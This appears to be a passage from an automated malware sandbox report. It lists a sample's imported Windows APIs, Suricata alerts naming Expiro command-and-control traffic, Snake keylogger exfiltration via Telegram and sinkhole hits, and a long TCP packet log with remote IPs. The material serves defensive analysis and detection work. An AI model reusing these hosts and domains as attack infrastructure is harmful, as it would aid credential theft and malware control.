ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T15:47:19.510170+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.7	49705	TCP
2024-12-13T15:47:19.510170+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.7	49705	TCP
2024-12-13T15:47:24.386280+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49714	132.226.8.169	80	TCP
2024-12-13T15:47:25.763240+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.7	49242	1.1.1.1	53	UDP
2024-12-13T15:47:25.855498+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.7	49720	TCP
2024-12-13T15:47:25.855498+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.7	49720	TCP
2024-12-13T15:47:27.714419+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.7	49726	172.234.222.138	80	TCP
2024-12-13T15:47:32.026960+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49714	132.226.8.169	80	TCP
2024-12-13T15:47:33.956723+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.7	63846	1.1.1.1	53	UDP
2024-12-13T15:47:34.261115+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.7	49747	149.154.167.220	443	TCP
2024-12-13T15:47:36.926344+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.7	49754	TCP
2024-12-13T15:47:36.926344+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.7	49754	TCP
2024-12-13T15:48:45.741779+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.7	49866	82.112.184.197	80	TCP
2024-12-13T15:49:10.635804+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.7	49961	TCP
2024-12-13T15:49:10.635804+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.7	49961	TCP
2024-12-13T15:49:17.325223+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.7	49977	TCP
2024-12-13T15:49:17.325223+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.7	49977	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 15:47:17.290599108 CET	49704	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:17.410661936 CET	80	49704	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:17.410765886 CET	49704	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:17.421261072 CET	49704	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:17.421303988 CET	49704	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:17.541313887 CET	80	49704	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:17.541344881 CET	80	49704	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:17.870055914 CET	49705	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:17.990421057 CET	80	49705	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:17.990516901 CET	49705	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:17.990751982 CET	49705	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:17.990768909 CET	49705	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:18.111501932 CET	80	49705	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:18.111685038 CET	80	49705	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:18.948837042 CET	80	49704	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:18.948853016 CET	80	49704	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:18.949062109 CET	49704	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:18.949062109 CET	49704	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:19.069801092 CET	80	49704	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:19.389044046 CET	80	49705	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:19.389265060 CET	80	49705	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:19.389318943 CET	49705	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:19.390244961 CET	49705	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:19.510169983 CET	80	49705	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:19.613522053 CET	49707	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.687266111 CET	49708	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.733340979 CET	80	49707	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:19.733444929 CET	49707	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.733642101 CET	49707	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.733654976 CET	49707	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.807286978 CET	80	49708	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:19.807604074 CET	49708	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.810775042 CET	49708	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.810775042 CET	49708	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:19.853451014 CET	80	49707	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:19.853468895 CET	80	49707	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:19.931329012 CET	80	49708	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:19.931370020 CET	80	49708	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:21.641169071 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:47:21.761137009 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:47:21.761569023 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:47:21.761653900 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:47:21.784295082 CET	80	49707	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:21.784418106 CET	80	49707	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:21.784507990 CET	49707	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:21.784507990 CET	49707	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:21.852374077 CET	80	49708	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:21.852477074 CET	80	49708	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:21.852930069 CET	49708	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:21.881462097 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:47:21.904851913 CET	80	49707	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:22.150084019 CET	49708	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:22.394257069 CET	49715	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:22.514133930 CET	80	49715	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:22.514282942 CET	49715	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:22.514461040 CET	49715	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:22.514481068 CET	49715	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:22.634140968 CET	80	49715	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:22.634154081 CET	80	49715	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:23.843822002 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:47:23.849396944 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:47:23.908278942 CET	80	49715	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:23.908466101 CET	80	49715	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:23.908509970 CET	49715	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:23.908540010 CET	49715	80	192.168.2.7	54.244.188.177
Dec 13, 2024 15:47:23.969171047 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:47:24.028239012 CET	80	49715	54.244.188.177	192.168.2.7
Dec 13, 2024 15:47:24.343229055 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:47:24.386280060 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:47:24.503385067 CET	49720	80	192.168.2.7	44.221.84.105
Dec 13, 2024 15:47:24.537774086 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:24.537852049 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:24.537942886 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:24.545042038 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:24.545079947 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:24.628221989 CET	80	49720	44.221.84.105	192.168.2.7
Dec 13, 2024 15:47:24.628310919 CET	49720	80	192.168.2.7	44.221.84.105
Dec 13, 2024 15:47:24.628628969 CET	49720	80	192.168.2.7	44.221.84.105
Dec 13, 2024 15:47:24.628689051 CET	49720	80	192.168.2.7	44.221.84.105
Dec 13, 2024 15:47:24.748697996 CET	80	49720	44.221.84.105	192.168.2.7
Dec 13, 2024 15:47:24.748713017 CET	80	49720	44.221.84.105	192.168.2.7
Dec 13, 2024 15:47:25.730626106 CET	80	49720	44.221.84.105	192.168.2.7
Dec 13, 2024 15:47:25.731683969 CET	80	49720	44.221.84.105	192.168.2.7
Dec 13, 2024 15:47:25.733542919 CET	49720	80	192.168.2.7	44.221.84.105
Dec 13, 2024 15:47:25.734057903 CET	49720	80	192.168.2.7	44.221.84.105
Dec 13, 2024 15:47:25.764671087 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:25.764750004 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:25.770378113 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:25.770385981 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:25.770680904 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:25.823761940 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:25.828332901 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:25.855498075 CET	80	49720	44.221.84.105	192.168.2.7
Dec 13, 2024 15:47:25.875329971 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:26.209934950 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:26.210007906 CET	443	49721	104.21.67.152	192.168.2.7
Dec 13, 2024 15:47:26.211983919 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:26.216744900 CET	49721	443	192.168.2.7	104.21.67.152
Dec 13, 2024 15:47:26.262850046 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:26.382627010 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:47:26.382931948 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:26.382931948 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:26.382961988 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:26.503456116 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:47:26.503606081 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:47:27.663705111 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:47:27.714418888 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:27.899374008 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:47:28.019292116 CET	80	49733	72.52.179.174	192.168.2.7
Dec 13, 2024 15:47:28.019423962 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:47:28.019716978 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:47:28.139609098 CET	80	49733	72.52.179.174	192.168.2.7
Dec 13, 2024 15:47:29.186801910 CET	80	49733	72.52.179.174	192.168.2.7
Dec 13, 2024 15:47:29.230098009 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:47:29.601356030 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:29.721106052 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:29.721179962 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:29.721390963 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:29.841881990 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013452053 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013637066 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013689041 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.013727903 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013741970 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013830900 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013851881 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013863087 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013864994 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.013875961 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013889074 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.013892889 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.013907909 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.014030933 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.014354944 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.133651972 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.133722067 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.133785009 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.137870073 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.183182001 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.206115961 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.206228018 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:47:31.206284046 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:47:31.261177063 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:31.261177063 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:31.381061077 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:47:31.381079912 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:47:31.468624115 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:47:31.588570118 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:47:31.640955925 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:47:31.644562006 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:47:31.683224916 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:47:31.765645981 CET	80	49733	72.52.179.174	192.168.2.7
Dec 13, 2024 15:47:31.983454943 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:47:32.011565924 CET	80	49733	72.52.179.174	192.168.2.7
Dec 13, 2024 15:47:32.026959896 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:47:32.058181047 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:47:32.131695986 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:32.131742001 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:32.131864071 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:32.132349968 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:32.132380009 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:32.466949940 CET	49748	80	192.168.2.7	199.59.243.227
Dec 13, 2024 15:47:32.586793900 CET	80	49748	199.59.243.227	192.168.2.7
Dec 13, 2024 15:47:32.586882114 CET	49748	80	192.168.2.7	199.59.243.227
Dec 13, 2024 15:47:32.587976933 CET	49748	80	192.168.2.7	199.59.243.227
Dec 13, 2024 15:47:32.707885027 CET	80	49748	199.59.243.227	192.168.2.7
Dec 13, 2024 15:47:33.521704912 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:33.521768093 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:33.526299000 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:33.526324034 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:33.526741982 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:33.537295103 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:33.583359003 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:33.583425045 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:33.583440065 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:33.683465958 CET	80	49748	199.59.243.227	192.168.2.7
Dec 13, 2024 15:47:33.683528900 CET	80	49748	199.59.243.227	192.168.2.7
Dec 13, 2024 15:47:33.683686972 CET	49748	80	192.168.2.7	199.59.243.227
Dec 13, 2024 15:47:34.261173964 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:34.261269093 CET	443	49747	149.154.167.220	192.168.2.7
Dec 13, 2024 15:47:34.261362076 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:34.261976957 CET	49747	443	192.168.2.7	149.154.167.220
Dec 13, 2024 15:47:34.604235888 CET	49754	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:34.724059105 CET	80	49754	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:34.726423979 CET	49754	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:34.761908054 CET	49754	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:34.762320995 CET	49754	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:34.881658077 CET	80	49754	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:34.882071972 CET	80	49754	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:36.799390078 CET	80	49754	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:36.799571991 CET	80	49754	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:36.799658060 CET	49754	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:36.806526899 CET	49754	80	192.168.2.7	18.141.10.107
Dec 13, 2024 15:47:36.926343918 CET	80	49754	18.141.10.107	192.168.2.7
Dec 13, 2024 15:47:38.464018106 CET	49762	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:47:38.583728075 CET	80	49762	82.112.184.197	192.168.2.7
Dec 13, 2024 15:47:38.583815098 CET	49762	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:47:38.584028959 CET	49762	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:47:38.584057093 CET	49762	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:47:38.703946114 CET	80	49762	82.112.184.197	192.168.2.7
Dec 13, 2024 15:47:38.703967094 CET	80	49762	82.112.184.197	192.168.2.7
Dec 13, 2024 15:47:43.683511972 CET	80	49748	199.59.243.227	192.168.2.7
Dec 13, 2024 15:47:43.683811903 CET	49748	80	192.168.2.7	199.59.243.227
Dec 13, 2024 15:47:43.683952093 CET	49748	80	192.168.2.7	199.59.243.227
Dec 13, 2024 15:47:43.803708076 CET	80	49748	199.59.243.227	192.168.2.7
Dec 13, 2024 15:48:00.484627008 CET	80	49762	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:00.484946966 CET	49762	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:00.485742092 CET	49762	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:00.606306076 CET	80	49762	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:00.694647074 CET	49811	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:00.814951897 CET	80	49811	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:00.815836906 CET	49811	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:00.817935944 CET	49811	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:00.817970991 CET	49811	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:00.938221931 CET	80	49811	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:00.938261986 CET	80	49811	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:01.640381098 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:48:01.641971111 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:48:01.642076969 CET	49726	80	192.168.2.7	172.234.222.138
Dec 13, 2024 15:48:01.762366056 CET	80	49726	172.234.222.138	192.168.2.7
Dec 13, 2024 15:48:22.709744930 CET	80	49811	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:22.710020065 CET	49811	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:22.711385965 CET	49811	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:22.831588030 CET	80	49811	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:23.688388109 CET	49866	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:23.809443951 CET	80	49866	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:23.809633017 CET	49866	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:23.812203884 CET	49866	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:23.812203884 CET	49866	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:23.933348894 CET	80	49866	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:23.933480978 CET	80	49866	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:36.984752893 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:48:36.986430883 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:48:37.014715910 CET	80	49733	72.52.179.174	192.168.2.7
Dec 13, 2024 15:48:37.014786005 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:48:37.014858961 CET	49733	80	192.168.2.7	72.52.179.174
Dec 13, 2024 15:48:37.135063887 CET	80	49733	72.52.179.174	192.168.2.7
Dec 13, 2024 15:48:45.741576910 CET	80	49866	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:45.741779089 CET	49866	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:45.741883039 CET	49866	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:45.768296957 CET	49914	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:45.874881983 CET	80	49866	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:45.888676882 CET	80	49914	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:45.892472982 CET	49914	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:45.892661095 CET	49914	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:45.892661095 CET	49914	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:48:46.012809992 CET	80	49914	82.112.184.197	192.168.2.7
Dec 13, 2024 15:48:46.012826920 CET	80	49914	82.112.184.197	192.168.2.7
Dec 13, 2024 15:49:06.696773052 CET	49714	80	192.168.2.7	132.226.8.169
Dec 13, 2024 15:49:06.817040920 CET	80	49714	132.226.8.169	192.168.2.7
Dec 13, 2024 15:49:07.511399031 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:49:07.632095098 CET	80	49735	76.223.26.96	192.168.2.7
Dec 13, 2024 15:49:07.632400990 CET	49735	80	192.168.2.7	76.223.26.96
Dec 13, 2024 15:49:07.788944006 CET	80	49914	82.112.184.197	192.168.2.7
Dec 13, 2024 15:49:07.790405035 CET	49914	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:49:07.790405035 CET	49914	80	192.168.2.7	82.112.184.197
Dec 13, 2024 15:49:07.910904884 CET	80	49914	82.112.184.197	192.168.2.7
Dec 13, 2024 15:49:08.368948936 CET	49961	80	192.168.2.7	47.129.31.212
Dec 13, 2024 15:49:08.489254951 CET	80	49961	47.129.31.212	192.168.2.7
Dec 13, 2024 15:49:08.489377022 CET	49961	80	192.168.2.7	47.129.31.212
Dec 13, 2024 15:49:08.491862059 CET	49961	80	192.168.2.7	47.129.31.212
Dec 13, 2024 15:49:08.491874933 CET	49961	80	192.168.2.7	47.129.31.212
Dec 13, 2024 15:49:08.612240076 CET	80	49961	47.129.31.212	192.168.2.7
Dec 13, 2024 15:49:08.612253904 CET	80	49961	47.129.31.212	192.168.2.7
Dec 13, 2024 15:49:10.513477087 CET	80	49961	47.129.31.212	192.168.2.7
Dec 13, 2024 15:49:10.513578892 CET	80	49961	47.129.31.212	192.168.2.7
Dec 13, 2024 15:49:10.513624907 CET	49961	80	192.168.2.7	47.129.31.212
Dec 13, 2024 15:49:10.515485048 CET	49961	80	192.168.2.7	47.129.31.212
Dec 13, 2024 15:49:10.635803938 CET	80	49961	47.129.31.212	192.168.2.7
Dec 13, 2024 15:49:14.359790087 CET	49977	80	192.168.2.7	13.251.16.150
Dec 13, 2024 15:49:14.479929924 CET	80	49977	13.251.16.150	192.168.2.7
